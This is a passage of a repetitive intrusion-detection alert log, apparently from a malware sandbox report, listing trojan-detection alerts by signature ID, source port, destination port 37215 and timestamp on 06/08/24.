          SID:2835222
          Source Port:43592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822473
          SID:2829579
          Source Port:56836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020923
          SID:2835222
          Source Port:50544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510987
          SID:2829579
          Source Port:56748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107902
          SID:2835222
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554518
          SID:2835222
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108537
          SID:2829579
          Source Port:53556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257602
          SID:2835222
          Source Port:51998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513183
          SID:2829579
          Source Port:33544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708825
          SID:2835222
          Source Port:48724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796216
          SID:2829579
          Source Port:45324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709496
          SID:2829579
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021153
          SID:2829579
          Source Port:55620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044171
          SID:2829579
          Source Port:37288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.799361
          SID:2835222
          Source Port:53546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554800
          SID:2829579
          Source Port:44628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743278
          SID:2829579
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462154
          SID:2835222
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041023
          SID:2829579
          Source Port:38336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153170
          SID:2829579
          Source Port:56738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112290
          SID:2835222
          Source Port:56526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.821046
          SID:2835222
          Source Port:52590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071091
          SID:2829579
          Source Port:49598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896170
          SID:2835222
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160911
          SID:2829579
          Source Port:52504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675064
          SID:2829579
          Source Port:35792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740978
          SID:2835222
          Source Port:57530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.149272
          SID:2835222
          Source Port:39292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395360
          SID:2835222
          Source Port:44716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511302
          SID:2835222
          Source Port:47704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114370
          SID:2835222
          Source Port:43144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511692
          SID:2835222
          Source Port:56714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896513
          SID:2835222
          Source Port:50122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180305
          SID:2829579
          Source Port:39576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174041
          SID:2835222
          Source Port:47628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016907
          SID:2829579
          Source Port:53014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350882
          SID:2835222
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396074
          SID:2829579
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745812
          SID:2835222
          Source Port:37082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408616
          SID:2835222
          Source Port:48152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744662
          SID:2835222
          Source Port:48834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272065
          SID:2829579
          Source Port:55748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730665
          SID:2829579
          Source Port:35080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744858
          SID:2829579
          Source Port:58398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708195
          SID:2835222
          Source Port:34950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743758
          SID:2835222
          Source Port:38266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352509
          SID:2829579
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862255
          SID:2835222
          Source Port:39256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173202
          SID:2829579
          Source Port:57056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160677
          SID:2835222
          Source Port:58062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461387
          SID:2829579
          Source Port:57194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237556
          SID:2829579
          Source Port:32790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668543
          SID:2829579
          Source Port:52646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176338
          SID:2829579
          Source Port:47416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671895
          SID:2835222
          Source Port:60230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599827
          SID:2829579
          Source Port:42100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.913619
          SID:2835222
          Source Port:37036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014957
          SID:2829579
          Source Port:56786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747771
          SID:2835222
          Source Port:53648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549525
          SID:2829579
          Source Port:39138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671390
          SID:2829579
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158084
          SID:2829579
          Source Port:43400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788784
          SID:2835222
          Source Port:58830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911969
          SID:2829579
          Source Port:33424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.062877
          SID:2829579
          Source Port:45994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130610
          SID:2829579
          Source Port:33562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912554
          SID:2835222
          Source Port:33218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601184
          SID:2829579
          Source Port:41218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261356
          SID:2835222
          Source Port:34024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396173
          SID:2835222
          Source Port:45198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174738
          SID:2829579
          Source Port:52920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467785
          SID:2829579
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901760
          SID:2829579
          Source Port:38806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747312
          SID:2835222
          Source Port:44426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673170
          SID:2829579
          Source Port:49100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465748
          SID:2835222
          Source Port:37736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129577
          SID:2829579
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129237
          SID:2835222
          Source Port:55602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057928
          SID:2829579
          Source Port:55346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107814
          SID:2835222
          Source Port:57406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440579
          SID:2835222
          Source Port:57470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861564
          SID:2829579
          Source Port:55514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239903
          SID:2829579
          Source Port:57726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161664
          SID:2835222
          Source Port:41674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549804
          SID:2835222
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294695
          SID:2835222
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854764
          SID:2829579
          Source Port:41384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440601
          SID:2829579
          Source Port:49314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606385
          SID:2829579
          Source Port:36124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509579
          SID:2835222
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130076
          SID:2829579
          Source Port:39646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595099
          SID:2829579
          Source Port:34508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353289
          SID:2829579
          Source Port:43408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604662
          SID:2829579
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898076
          SID:2829579
          Source Port:48154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.293222
          SID:2829579
          Source Port:47268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542865
          SID:2829579
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059515
          SID:2835222
          Source Port:59422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378488
          SID:2829579
          Source Port:43982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173490
          SID:2829579
          Source Port:51732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857415
          SID:2835222
          Source Port:41576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788936
          SID:2835222
          Source Port:59508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153872
          SID:2829579
          Source Port:38242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352325
          SID:2829579
          Source Port:40436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110817
          SID:2835222
          Source Port:56058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150349
          SID:2829579
          Source Port:48032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792113
          SID:2835222
          Source Port:42506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129344
          SID:2829579
          Source Port:54070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896562
          SID:2829579
          Source Port:60774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018224
          SID:2829579
          Source Port:57188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353309
          SID:2835222
          Source Port:60632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441022
          SID:2835222
          Source Port:34258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671267
          SID:2829579
          Source Port:48420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733780
          SID:2829579
          Source Port:53018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447187
          SID:2829579
          Source Port:38834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044005
          SID:2829579
          Source Port:53912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446037
          SID:2835222
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352856
          SID:2829579
          Source Port:35916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516159
          SID:2835222
          Source Port:59578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792918
          SID:2829579
          Source Port:51310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108374
          SID:2829579
          Source Port:58296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512253
          SID:2835222
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354038
          SID:2835222
          Source Port:33222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704083
          SID:2835222
          Source Port:53254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902021
          SID:2835222
          Source Port:42530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667422
          SID:2835222
          Source Port:49870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351721
          SID:2835222
          Source Port:54122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401986
          SID:2835222
          Source Port:56628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731474
          SID:2835222
          Source Port:41018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172878
          SID:2835222
          Source Port:59794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150862
          SID:2829579
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440752
          SID:2829579
          Source Port:46032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670575
          SID:2835222
          Source Port:33188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403713
          SID:2835222
          Source Port:56114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272974
          SID:2835222
          Source Port:40052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731572
          SID:2835222
          Source Port:43076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782987
          SID:2835222
          Source Port:44866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356419
          SID:2829579
          Source Port:53612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857440
          SID:2829579
          Source Port:52818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270893
          SID:2829579
          Source Port:37734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396221
          SID:2829579
          Source Port:42898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044249
          SID:2835222
          Source Port:48562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600366
          SID:2835222
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855189
          SID:2835222
          Source Port:39298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241634
          SID:2829579
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546540
          SID:2829579
          Source Port:40224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175495
          SID:2829579
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179660
          SID:2829579
          Source Port:59752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706455
          SID:2835222
          Source Port:53506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890632
          SID:2829579
          Source Port:49120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707596
          SID:2829579
          Source Port:53174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471916
          SID:2829579
          Source Port:49568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892312
          SID:2835222
          Source Port:46272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059730
          SID:2835222
          Source Port:37120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406028
          SID:2829579
          Source Port:38014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780784
          SID:2829579
          Source Port:40196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071491
          SID:2829579
          Source Port:47402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063239
          SID:2835222
          Source Port:60096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155311
          SID:2829579
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890913
          SID:2835222
          Source Port:54988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242732
          SID:2829579
          Source Port:41526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449127
          SID:2829579
          Source Port:42126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465974
          SID:2829579
          Source Port:36652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509949
          SID:2835222
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041102
          SID:2835222
          Source Port:40052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816507
          SID:2829579
          Source Port:34618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114426
          SID:2835222
          Source Port:35544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883886
          SID:2835222
          Source Port:43528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731524
          SID:2835222
          Source Port:35582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445992
          SID:2829579
          Source Port:43766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746461
          SID:2829579
          Source Port:42550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356504
          SID:2829579
          Source Port:59478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261003
          SID:2835222
          Source Port:55316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258579
          SID:2835222
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154053
          SID:2835222
          Source Port:59934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396357
          SID:2829579
          Source Port:55760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107108
          SID:2835222
          Source Port:41620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070951
          SID:2835222
          Source Port:60138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236548
          SID:2829579
          Source Port:43804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446075
          SID:2835222
          Source Port:53370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108356
          SID:2835222
          Source Port:59438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709116
          SID:2829579
          Source Port:43102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793073
          SID:2835222
          Source Port:40704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547359
          SID:2835222
          Source Port:60008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.450004
          SID:2829579
          Source Port:37178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743375
          SID:2835222
          Source Port:37978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798725
          SID:2835222
          Source Port:49762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.790002
          SID:2835222
          Source Port:41972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781285
          SID:2835222
          Source Port:55124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005801
          SID:2829579
          Source Port:37868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461591
          SID:2829579
          Source Port:58514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402120
          SID:2829579
          Source Port:53922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892383
          SID:2829579
          Source Port:55052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898044
          SID:2829579
          Source Port:54926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136176
          SID:2829579
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600901
          SID:2835222
          Source Port:54266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549911
          SID:2835222
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169501
          SID:2835222
          Source Port:56882
          Destination Port:37215
